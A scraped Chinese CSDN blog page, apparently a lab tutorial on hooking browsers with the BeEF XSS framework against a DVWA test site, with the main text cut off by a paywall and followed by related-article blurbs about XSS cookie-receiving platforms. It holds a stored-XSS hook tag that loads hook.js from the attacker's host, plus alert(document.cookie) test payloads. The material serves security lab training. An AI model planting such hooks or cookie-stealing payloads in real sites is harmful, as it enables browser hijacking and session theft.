搭建XSS平台——XSS工具的利用

最新推荐文章于 2024-07-23 15:42:30 发布
最新推荐文章于 2024-07-23 15:42:30 发布
阅读量2.4k 收藏 3
点赞数 3
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104483660
版权

实验一:XSS攻击框架beef

实验环境:kali、DVWA

实验步骤:

1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef)

2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下:

<script src="http://192.168.1.106:3000/hook.js"></script>

3.在低级DVWA中的储存式XSS模块中输入以下内容,可看到kali上面有了变化

最低0.47元/天 解锁文章
没有如果ru果
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
存储型XSS灰盒测试-01
09-15
在这个课程中,我们学习了如何进行存储型XSS的灰盒测试,包括环境搭建、定向XSS挖掘、黑名单审计和绕过过滤、触发XSS。这些知识点对于Web应用程序的安全检测和防护非常重要。 存储型XSS是一种非常危险的Web应用安全...
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ran的博客
03-14 2126
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
XSS数据接收平台——蓝莲花(BlueLotus)
p36273的博客
06-17 6167
蓝莲花平台是清华大学曾经的蓝莲花战队搭建平台,该平台用于接收xss返回数据。用xss数据接收平台的好处:正常执行反射型xss和存储型xss,反射型xss在执行poc时,会直接在页面弹出执行注入的poc代码;存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;而使用这种数据接收平台,在用户页面就不会再弹出这个窗口,但在数据接收平台还是可以获取到用户的cookie,以免被用户发觉。
XSS攻击平台,攻击pikachu
最新发布
ineedmoreMuQ的博客
07-23 161
XSS攻击平台,攻击pikachu
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2618
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
手把手教你搭建XSS平台
热门推荐
seek_2022的博客
05-05 1万+
出于学习和技术分享的目的研究了一下XSS平台搭建的方法,由于网络上的教程虽然很多,但是对于很多细节的讲解不够深入,现将XSS平台搭建方法分享给大家。
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 5855
平台的网址是:链接:XSS在线平台
2022年全新UI聚合支付系统四方源码4月最新更新安全升级修复XSS漏洞和补单漏洞新增诸多实用功能完美版
04-16
源码内附安装教程,20多项功能及安全方面的更新文档,源码说明等,小白也能轻松搭建。 能够轻松应对高并发,等以前版本无法应对的并发问题,也不会被恶意补单漏洞侵扰,全站修复了XSS攻击漏洞。 仅供研究学习使用!
asp环境搭建工具
08-06
在本文中,我们将深入探讨如何使用“asp环境搭建工具”——AspWebServer来创建和运行ASP应用程序。 AspWebServer是一款专为ASP开发设计的轻量级服务器软件,它的主要特点包括: 1. **易于安装与配置**:AspWeb...
PHP实例开发源码——AB自动发卡平台源码.zip
11-25
【PHP实例开发源码——AB自动发卡平台源码】 PHP是一种广泛使用的开源脚本语言,尤其在Web开发领域有着深厚的根基。这个实例是关于AB自动发卡平台的源码,它展示了如何利用PHP来创建一个高效、安全的在线发卡系统。...
JeeSite快速开发平台 v4.7.0.zip
03-25
《JeeSite快速开发平台 v4.7.0——打造高效能的企业级应用》 JeeSite是一款基于Java EE技术栈的开源快速开发平台,旨在提高企业级应用的开发效率,减少重复工作,让开发者更专注于业务逻辑。v4.7.0版本是其发展历程...
搭建属于自己的xss平台
m0_60716947的博客
05-03 1万+
一、什么是打 cookie 简单来说就是:在你访问的页面上执行了一次JS代码,这次代码的执行后可以获取你当前已经登录某个网站的cookie ,并将该cookie 发送到攻击者指定的网站,攻击者利用你的cookie 登录你的账号。 攻击者用来接收cookie 的平台就叫做xss 平台,在网上其实有很多这种平台,但其实有的平台存在黑吃黑的现象(懂得都懂),而且有很多渗透测试任务都是保密的,不可能去第三方网站。 二、cookie 接收平台 这里推荐一个平台,BlueLotus_XSSReceiver
XSS数据接收平台
2301_81475812的博客
02-16 1469
存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;3.我的项目,点击创建,项目名称和描述随便填,之后点击下一步,选择需要的模板,这里选择“基础默认模块”就好,之后点击下一步,项目就创建成功了。4.提交后,显示安装成功,直接点击登录就跳转到,登录控制面板,输入前面的密码,即可登录到XSS接受面板。进入“我的JS”模块输入要创建的模板名,选择要用的模块,点击插入模块,之后点击新增按钮。4.将复制的payload,放到dvwa的xss模块执。
web靶场——xss-labs靶机平台搭建和代码审计
weixin_51525416的博客
09-05 5703
web靶场-xss-labs靶机平台搭建和代码审计
xss平台详解及练习
m0_55854679的博客
08-19 2659
文章目录xss平台使用教程练习CTFhub web 反射型xss XSS平台 xss平台使用教程 xss平台使用教程 练习 CTFhub web 反射型xss 在第一栏处输入测试语句 <script>alert('xss')</script> <script>alert(document.cookie)</script> 我第一次做这道题也没有思路,也是通过看别人写的wp学会的。 大佬博客 首先创建一个项目并选择默认模块 点击下一步随即跳转到一个项
渗透工具开发——XSS平台的命令行实现
Spontaneous_0的博客
02-20 1154
渗透工具开发——XSS平台的命令行实现
搭建xss-platform平台
qq_50854662的博客
05-16 5140
这篇更详细,对蓝莲花的XSS有更详细的说明 https://blog.csdn.net/weixin_50464560/article/details/115360092 https://bbs.secgeeker.net/thread-1519-1-1.html 搭建xss-platform平台 一直想搭在公网搭建自己的XSS平台用来验证XSS漏洞,使用别人的平台自己心里总会有担心被摘果子的顾虑,前几天参考了不少前人...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 855
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
XSS平台搭建及后台使用(cookie获取)
2302_79885863的博客
04-12 1376
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值